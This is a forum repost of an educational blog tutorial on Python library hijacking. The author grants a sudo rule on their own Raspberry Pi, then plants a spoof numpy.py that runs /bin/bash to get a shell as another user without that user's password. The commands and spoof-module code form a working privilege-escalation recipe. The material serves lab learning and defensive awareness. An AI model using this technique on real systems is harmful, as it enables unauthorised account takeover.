[Tut] Python Library Hijacking – A Simple Demonstration on NumPy - Printable Version +- Sick Gaming (https://www.sickgaming.net) +-- Forum: Programming (https://www.sickgaming.net/forum-76.html) +--- Forum: Python (https://www.sickgaming.net/forum-83.html) +--- Thread: [Tut] Python Library Hijacking – A Simple Demonstration on NumPy (/thread-100269.html) |
[Tut] Python Library Hijacking – A Simple Demonstration on NumPy - xSicKxBot - 11-22-2022 Python Library Hijacking – A Simple Demonstration on NumPy <div> <div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{"align":"left","id":"908596","slug":"default","valign":"top","ignore":"","reference":"auto","class":"","count":"1","legendonly":"","readonly":"","score":"5","best":"5","gap":"5","greet":"Rate this post","legend":"5\/5 - (1 vote)","size":"24","width":"142.5","_legend":"{score}\/{best} - ({count} {votes})","font_factor":"1.25"}'> <div class="kksr-stars"> <div class="kksr-stars-inactive"> <div class="kksr-star" data-star="1" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" data-star="2" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" data-star="3" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" data-star="4" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" data-star="5" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> </p></div> <div class="kksr-stars-active" style="width: 142.5px;"> <div class="kksr-star" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> <div class="kksr-star" style="padding-right: 5px"> <div class="kksr-icon" style="width: 24px; height: 24px;"></div> </p></div> </p></div> </div> <div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div> </div> <p>In this blog post, I’ll show you how recreated a <strong>Python library hijacking vulnerability </strong>on my home network. </p> <div class="wp-block-image"> <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="1021" height="571" src="https://blog.finxter.com/wp-content/uploads/2022/11/image-224.png" alt="" class="wp-image-908642" srcset="https://blog.finxter.com/wp-content/uploads/2022/11/image-224.png 1021w, https://blog.finxter.com/wp-content/uploads/2022/11/image-224-300x168.png 300w, https://blog.finxter.com/wp-content/uploads/2022/11/image-224-768x430.png 768w" sizes="(max-width: 1021px) 100vw, 1021px" /></figure> </div> <p>The <a href="https://tryhackme.com/room/wonderland" data-type="URL" data-id="https://tryhackme.com/room/wonderland" target="_blank" rel="noreferrer noopener">Wonderland box on TryHackMe</a> was the inspiration for exploring this kind of vulnerability.</p> <p>In my previous <a href="https://blog.finxter.com/tryhackme-walkthrough-wonderland/" data-type="post" data-id="892288" target="_blank" rel="noreferrer noopener">Wonderland walkthrough blog post</a>, I highlighted an example of exploiting the ‘<code><a href="https://blog.finxter.com/python-random-module/" data-type="post" data-id="5030" target="_blank" rel="noreferrer noopener">random</a></code>’ module to switch users without knowing their password. </p> <p>In this post, I’ll guide you through the setup and execution of the exploit. You can also watch the accompanying video tutorial here:</p> <figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/python-library-hijacking-demonstration/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FvXkGYLfQauk%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure> <h2>What is Python Library Hijacking?</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="607" height="911" src="https://blog.finxter.com/wp-content/uploads/2022/11/image-225.png" alt="" class="wp-image-908661" srcset="https://blog.finxter.com/wp-content/uploads/2022/11/image-225.png 607w, https://blog.finxter.com/wp-content/uploads/2022/11/image-225-200x300.png 200w" sizes="(max-width: 607px) 100vw, 607px" /></figure> </div> <p>When a user has permission to run a file as another user it is possible to create a <strong>spoof file</strong> that Python will load instead of the originally intended module or library. The necessary conditions for Python library hijacking are:</p> <ol> <li>The user must have sudo permissions to run a Python file <code>.py</code> as another user</li> <li>The Python path must be set to look first in the folder where the spoof file is stored </li> </ol> <h2>Setup</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="608" height="912" src="https://blog.finxter.com/wp-content/uploads/2022/11/image-226.png" alt="" class="wp-image-908664" srcset="https://blog.finxter.com/wp-content/uploads/2022/11/image-226.png 608w, https://blog.finxter.com/wp-content/uploads/2022/11/image-226-200x300.png 200w" sizes="(max-width: 608px) 100vw, 608px" /></figure> </div> <p>In order to re-create this vulnerability, I had to learn how to set up the above conditions for the exploit. </p> <p>On my home network, I have a <a rel="noreferrer noopener" href="https://blog.finxter.com/getting-to-know-your-basic-uctronics-raspberry-pi-pico-kit/" data-type="post" data-id="892909" target="_blank">Raspberry Pi</a> 3b running DietPi operating system. Originally I set this up to run Pi-hole to filter ads out from my home network. </p> <p>In order to set up the permissions to run a file as another user I edited the sudoers file with <code>visudo</code>. </p> <p><a rel="noreferrer noopener" href="https://www.sudo.ws/docs/man/1.8.13/visudo.man/" data-type="URL" data-id="https://www.sudo.ws/docs/man/1.8.13/visudo.man/" target="_blank">Visudo</a> is a special editor specifically for editing the sudoers file. It only allows one user to edit the file at a time, and also checks user edits for correct syntax. I created a file called ‘<code>checkmypermissions.py</code>’ and granted sudo permissions to <code>vulnerableuser</code> to run it as user ben. </p> <div class="wp-block-image"> <figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="238" src="https://blog.finxter.com/wp-content/uploads/2022/11/image-219-1024x238.png" alt="" class="wp-image-908611" srcset="https://blog.finxter.com/wp-content/uploads/2022/11/image-219-1024x238.png 1024w, https://blog.finxter.com/wp-content/uploads/2022/11/image-219-300x70.png 300w, https://blog.finxter.com/wp-content/uploads/2022/11/image-219-768x178.png 768w, https://blog.finxter.com/wp-content/uploads/2022/11/image-219.png 1249w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure> </div> <p>To do this I used the command ‘<code>sudo visudo</code>’ to edit sudoers file, and then I added the second line for vulnerable user:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="3" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group=""># User privilege specification root ALL=(ALL:ALL) ALL vulnerableuser ALL=(ben:1001) /usr/bin/python3 /home/vulnerableuser/checkmypermissions.py</pre> <p>The nice thing about <code>visudo</code> is that it checks your formatting to make sure that there are not any errors, and it will even suggest changes to help you format the permissions correctly. </p> <p>This functionality helped me save time getting the correct spacing and punctuation on the new sudoers line.</p> <h2>Running the Exploit</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="608" height="912" src="https://blog.finxter.com/wp-content/uploads/2022/11/image-227.png" alt="" class="wp-image-908667" srcset="https://blog.finxter.com/wp-content/uploads/2022/11/image-227.png 608w, https://blog.finxter.com/wp-content/uploads/2022/11/image-227-200x300.png 200w" sizes="(max-width: 608px) 100vw, 608px" /></figure> </div> <p>Once the permissions were set up I ssh’d into <code>vulnerableuser@<raspberry pi IP></code>. Running the ‘<code>sudo -l</code>’ command showed me the granular sudo permissions.</p> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="809" height="266" src="https://blog.finxter.com/wp-content/uploads/2022/11/image-220.png" alt="" class="wp-image-908621" srcset="https://blog.finxter.com/wp-content/uploads/2022/11/image-220.png 809w, https://blog.finxter.com/wp-content/uploads/2022/11/image-220-300x99.png 300w, https://blog.finxter.com/wp-content/uploads/2022/11/image-220-768x253.png 768w" sizes="(max-width: 809px) 100vw, 809px" /></figure> </div> <p>The line above <code>(ben : 1001) /usr/bin/python3 /home/vulnerableuser/checkmypermissions.py</code> shows that as <code>vulnerableuser</code> I can execute the <code>checkmypermissions.py</code> file <em>as the user Ben</em>. </p> <p>All that is left to do is to check the Python PATH to make sure that it checks first in the current directory, and then create a python file named <code>numpy.py</code> with code to spawn a shell. One way to check the Python PATH is:</p> <p><strong>Python</strong></p> <pre class="EnlighterJSRAW" data-enlighter-language="python" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">import sys sys.path</pre> <p>In the example below, we can see that the python PATH is already set to search in the current working directory (<code>''</code>). </p> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="558" height="275" src="https://blog.finxter.com/wp-content/uploads/2022/11/image-221.png" alt="" class="wp-image-908628" srcset="https://blog.finxter.com/wp-content/uploads/2022/11/image-221.png 558w, https://blog.finxter.com/wp-content/uploads/2022/11/image-221-300x148.png 300w" sizes="(max-width: 558px) 100vw, 558px" /></figure> </div> <p>Next we create the <code>numpy.py</code> file to spawn a <a href="https://blog.finxter.com/how-to-execute-python-shell-commands/" data-type="post" data-id="887777" target="_blank" rel="noreferrer noopener">shell</a>.</p> <p><code><strong>nano numpy.py</strong></code></p> <pre class="EnlighterJSRAW" data-enlighter-language="python" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">import os os.system("/bin/bash") </pre> <p>It is important to first set up execute permissions on the spoofed <code>numpy.py</code> file:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">chmod +x numpy.py</pre> <p>Now we can carry out the python library hijack and spawn a shell as user ben without knowing their password by running the following command:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo -u ben /usr/bin/python3 /home/vulnerableuser/checkmypermissions.py </pre> <h2>Project Learnings</h2> <div class="wp-block-image"> <figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="608" height="912" src="https://blog.finxter.com/wp-content/uploads/2022/11/image-228.png" alt="" class="wp-image-908669" srcset="https://blog.finxter.com/wp-content/uploads/2022/11/image-228.png 608w, https://blog.finxter.com/wp-content/uploads/2022/11/image-228-200x300.png 200w" sizes="(max-width: 608px) 100vw, 608px" /></figure> </div> <h3>Learning #1</h3> <p>I learned that <strong>Visudo is a special editor within Linux</strong> to change the sudoers file <code>/etc/sudoers</code>. </p> <p>It helps check formatting to avoid any errors or crashes from poorly written lines. The sudoers file allows the root user to granularize user permissions with the sudoers file on Linux.</p> <h3>Learning #2</h3> <p>Granting run as another user file permissions can expose a machine to library hijacking vulnerabilities. </p> <p>Running <code>sudo -l</code> can help expose special user file permissions when enumerating for attack vectors to execute privilege escalation.</p> <h3>Learning #3</h3> <p>I found that it is helpful to compile a custom shortlist of Python and bash commands new to me for each project. I borrowed this strategy from my experience with language learning. </p> <p>Over the years, I’ve improved my Mandarin by taking notes on new vocabulary words and grammar patterns. When working on a new topic area I would always create my own custom grammar and vocabulary lists for reference. </p> <p>I’ve found that the simple act of focusing on recording a list helps to cement my learning and creates a nice reference for later use.</p> </div> https://www.sickgaming.net/blog/2022/11/20/python-library-hijacking-a-simple-demonstration-on-numpy/ |